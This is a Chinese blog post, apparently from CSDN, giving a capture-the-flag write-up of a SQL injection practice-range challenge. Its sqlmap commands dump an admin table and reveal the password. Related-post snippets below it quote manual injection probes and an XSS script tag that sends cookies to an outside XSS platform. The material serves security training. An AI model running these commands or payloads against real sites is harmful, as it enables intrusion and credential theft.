封神台——第一题:为了女神小芳

最新推荐文章于 2022-10-14 15:51:13 发布
最新推荐文章于 2022-10-14 15:51:13 发布
阅读量692 收藏 4
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37589805/article/details/112744675
版权

题目:获取数据库管理员密码

题目传送阵

渗透步骤

       第一步:点击“点击查看新闻”超链接,跳转到一个页面,url发生改变,设想这个页面存在sql漏洞。
在这里插入图片描述
       第二步:输入sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch,使用sqlmap对该页面进行扫描,看该页面是否存在漏洞,从结果得知可以从基于布尔以及时间的盲注进行攻击。
在这里插入图片描述
       第三步:输入sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch --dbs 查看数据库,发现maoshe数据库,结合页面,猜测需要获取的密码存在于这个数据库里面.
在这里插入图片描述
       第四步:输入sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch -D maoshe --tables查看maoshe数据库里面的表,发现admin这个表。
在这里插入图片描述
       第五步:输入sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch -D maoshe -T admin --columns查看admin里面的内容,发现用户名以及密码。
在这里插入图片描述
       第六步:输入sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch -D maoshe -T admin -C "username,password" --dump查看用户名以及密码,之后提交密码“hellohack”即可。
在这里插入图片描述

想学习安全的小白
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
神台----尤里的复仇I-第一章:为了女神小芳
正在学习的路上...
07-17 3004
1.找注入点 ?id=1 and 1=1 ------ 显示正常 ?id=1 and 1=2 ------ 不显示 2.猜列数、报显示位 ?id=1 order by 2 ------查询了两列 ?id=466454 select 1,2 ------将id设为一个不存在的数...
神台靶场-第一章:为了女神小芳!【SQL注入攻击原理】
红凳子的博客
05-07 2002
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 神台靶场-第一章:为了女神小芳!【SQL注入攻击原理】前言判断是否存在SQL注入漏洞二、使用步骤1.引入库2.读入数据总结 前言 提示:通过sql注入拿到管理员密码! 尤里正在追女神小芳,在得知小芳开了一家公司后,尤里通过whois查询发现了小芳公司网站,学过一点黑客技术的他,想在女神面前炫炫技。于是他打开了传送门 判断是否存在SQL注入漏洞 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二
神台-靶场-第一章:为了女神小芳!(解)+ 中北网安实训笔记-(20200701)-sql注入基本语法
tonyhapply的博客
07-18 1547
我们先来学习sql注入,
注入(一)
tomyyyyy
06-28 275
eg: 例子 第一步,判断是否存在sql注入漏洞 构造 ?id=1 and 1=1 ,回车 页面返回正常 构造 ?id=1 and 1=2 ,回车 页面不正常,初步判断这里 可能 存在一个注入漏洞 第二步:判断字段数 构造 ?id=1 and 1=1 order by 1 回车 页面正常 构造 ?id=1 and 1=1 order by 2 回车 页面正常 构造 ?id=1 and 1=1 o...
神台靶场 第一章:为了女神小芳 (SQL注入)
m0_65712192的博客
10-14 1634
神台靶场 第一章:为了女神小芳 (SQL注入)
神台第一章:为了女神小芳
qq_51459600的博客
12-22 501
实验平台:神台-掌控安全在线演练靶场 第一章:为了女神小芳! 传送门:http://rhiq8003.ia.aqlab.cn/ 实验目标:获取admin的密码 点击查看新闻1,跳转到http://rhiq8003.ia.aqlab.cn/?id=1 发现传递的参数名为id   判断有无注入点 http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 未显示出新闻内容,说明存在注入点   判断查询字段数 http://rhiq8003.ia.aqlab.cn/
神台-杂项8:奇怪的短信
最新发布
03-11
随波逐流工具,一个非常好用的解码工具
登录别人的账户(仅在神台靶场).mp4
04-07
这个教程仅在神台靶场可用,如在其他网站使用,否则属于违法行为,后果自负,本教程仅做参考,真正攻破防火墙属于违法行为
通达信2指标——射箭神(副图).doc
07-30
通达信2指标——射箭神(副图).doc
通达信指标——射箭神(副图).doc
07-30
通达信指标——射箭神(副图).doc
更改支付金额(仅在神台靶场).mp4
04-07
这个教程仅在神台靶场可用,如在其他网站使用,否则属于违法行为,后果自负,本教程仅做参考,真正攻破防火墙属于违法行为
第一章:为了女神小芳
m0_48294281的博客
01-05 1012
靶场学习心得,欢迎大家交流!
神台sql注入---第一章节: 为了女神小芳
qq_52573109的博客
09-14 787
1:靶场链接: https://hack.zkaq.cn/battle/target?id=485e58d0afa7e4f7https://hack.zkaq.cn/battle/target?id=485e58d0afa7e4f7 2:解过程: (1):打开传送门,点击"点击查看新闻"发现url出现参数 id = 1,猜测为注入点。 (2):判断字段个数: 注入代码: order by 2 ...
小芳
weixin_30378623的博客
02-19 346
回忆起 20多年来我们一起走过的日子,我就感到特别温馨、特别甜蜜。你第一次闯入我生命中的情景,仿佛就在眼前……第一次偶然相遇是1996年5月,那是一个夏风习习的夜晚,我刚从工地回来,同事就邀我一起去城建学院跳舞,踏进舞厅的一瞬间,在暗淡温柔的霓虹灯下,你那清新脱俗的靓影一下子就深深的嵌入了我的心里。记得大学时代,李春波的歌曲“小芳”响彻校园,那个叫小芳的村里姑娘,也深深的烙进了我的心底,成了我少年...
神台在线靶场--尤里的复仇Ⅰ 小芳!【8
feiniaotjx的博客
10-20 9151
靶场练习 神台-掌控安全在线演练靶场 第一章:为了女神小芳
神台靶场 第一章:为了女神小芳!writeup
Sk1y的博客
02-15 2万+
神台靶场 第一章:为了女神小芳目简述: 神台靶场,目链接 解过程: 首先是这样的url为: http://59.63.200.79:8003/ 当点击点击查看新闻时,相应的url变化,变为如下: http://59.63.200.79:8003/?id=1 ...
神台 - 掌控安全靶场】尤里的复仇 Ⅰ 小芳!一二三四五六七章
热门推荐
algae
08-14 3万+
神台 - 掌控安全靶场】尤里的复仇 小芳!第五章:进击!拿到Web最高权限!【配套课时:绕过防护上传木马实战演练】(等级:15) <script src = https://xsspt.com/nxqPZY?1597410463> </ script> cookie : ASPSESSIONIDSQDARATQ=KJFAFKEDEAPPFBEDHJFCIGIC; flag=zkz{xsser-g00d},ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNP
神台靶场(一)为了女神小芳 【SQL注入攻击】(超级详细)
xiao_mai_的博客
05-11 730
这里写自定义目录标欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
c4d修神记:零基础到三维神 下载
01-05
"c4d修神记:零基础到三维神"是一本关于学习Cinema 4D(简称C4D)软件的书籍。C4D是一款强大的三维建模、动画和渲染软件,广泛应用于电影、游戏、广告等领域。该书以零基础的读者为目标群体,旨在通过系统的教程和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值